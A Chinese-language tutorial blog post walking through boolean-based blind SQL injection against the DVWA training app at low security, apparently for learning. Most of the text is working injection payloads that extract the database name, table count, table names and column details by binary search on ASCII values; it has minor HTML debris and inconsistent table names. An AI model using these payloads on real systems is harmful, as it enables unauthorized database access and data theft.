sql盲注:从执行结果上无法从页面上看到之行结果
无法分析sql执行过程,甚至无法得知是否运行
盲注相对复杂
一.在安全级别为LOW基于布尔的盲注-注入点及类型判断
1.php代码分析
先检查一下User Id 是否为空,如果为空执行下列操作,先赋值id,之后再数据库中查询数据,将结果输出给result,将结果集中行的数量,如果大于0,输出User ID存在数据库中,否则发送数据包头并输出不存在数据库中,最后关闭函数。
2.函数分析
mysqli_num_rows()函数
header()函数
3.实际操作
(1)判断是否存在注入
出现这句话就是有注入点
(2)判断注入是字符型还是数字型
都能查到说明不是数字型
说明是字符型的
二.猜解数据库名
1.猜解数据库名的长度
1' and length(database())=1#
1' and length(database())=2#
1' and length(database())=3#
1' and length(database())=4#
显示存在
说明数据库长度为4
2.使用二分法逐个字符猜解数据库名
(1)二分查找
(2)字符串截取函数
(3)ascii码对比
Ascii()返回某个字符的ascii码值
65-90是A-Z
97-122是a-z
substr()字符串截取函数
substr(database(),1,1)截取数据库名字,返回数据库名字的第一个字符
(第一个1是从第1个字符开始,第二个1是截取一个字符)
substr(database(),2,1)返回第二个字符
(1)1' and ascii(substr(database(),1,1))>97#判断最小英文字符
(2)1' and ascii(substr(database(),1,1))<122#< span="">
所以是从b开始的,然后开始不断地尝试判断是什么字符
二分查找:a-z 总共26个字符,13,strat 97+13 109
(3)1' and ascii(substr(database(),1,1))>109#
13个字符取一半6
97+6 103
1' and ascii(substr(database(),1,1))>103#
6取一半是3
97+3 100
1' and ascii(substr(database(),1,1))>100#
3取一半是1
97+1 98
1' and ascii(substr(database(),1,1))>98#
所以大于98
1' and ascii(substr(database(),1,1))>99#
所以大于99,但不大于100
所以说第一个字符的ascii是100,d的ascii码是100,所以第一个字符是d
其他字符依次猜测,结果是dvwa
3猜一下数据库有几个表
1' and (select count(table_name) from information_schema.tables where table_schema=database())#
因为是盲注需要等量分析一下表的数量是几
1' and (select count(table_name) from information_schema.tables where table_schema=database())=1#
1' and (select count(table_name) from information_schema.tables where table_schema=database())=2#
说明表的数量是2
4猜解每个表的长度(1’ and length(substr(查询语句,1))==1#)
查询语句:select table_name from information_schema.tables where table_schema=database() limit 0,1 正常显示两条记录,但这只显示第一条,此语句作用:只显示数据库下第一个表的表名
Limit 0,1的0是从第1条记录开始,1是显示的记录的条数
substr((select table_name from infromation_schema.tables where table_schema=database() limit 0,1),1)
总的sql语句是:1' and length(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1))=1#
经过不断尝试,得知表名长度为9
1' and length(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1))=9#
5逐一猜一下表名(利用二分法)
ascii():返回单个字符的adcii码表
substr(返回表名,1,1):把表名从第1个字符开始截取,截取1个字符
返回表明的语句:(select table_name from information_schema.tables where table_schema=database() limit 0,1)
substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1)
ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1))
所以sql语句为
1’ and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1))>=97#
1’ and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1))<122#< span="">
1’ and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1))>109#
1’ and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1))>103#
1’ and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1))>100#
1’ and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1))>98#
1’ and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1))>99#
1’ and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1))<109#< span="">
1' and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1))<103#< span="">
1’ and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1))<103#< span="">
通过试验得知表名第一个ascii值是103,即表名第一个字母为g,又知道表名长度为9,所以猜测是(guestbook),最终证明确实如此
1' and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1))=103#
6.猜字段数量
1' and (select count(column_name) from information_schema.columns where table_name='guestbook')=1#
1' and (select count(column_name) from information_schema.columns where table_name='guestbook')=3#
所以字段数量为3
7.猜每个字段的长度
1' and length(substr((select column_name from information_schema.columns where table_name='users' limit 0,1),1))=1#
1' and length(substr((select column_name from information_schema.columns where table_name='users' limit 0,1),1))=7#
所以字段长度为7
8 猜字段名
9 猜数据
本文介绍的是SQL盲注,欢迎大家点赞和收藏,您的支持是我创作的最大动力!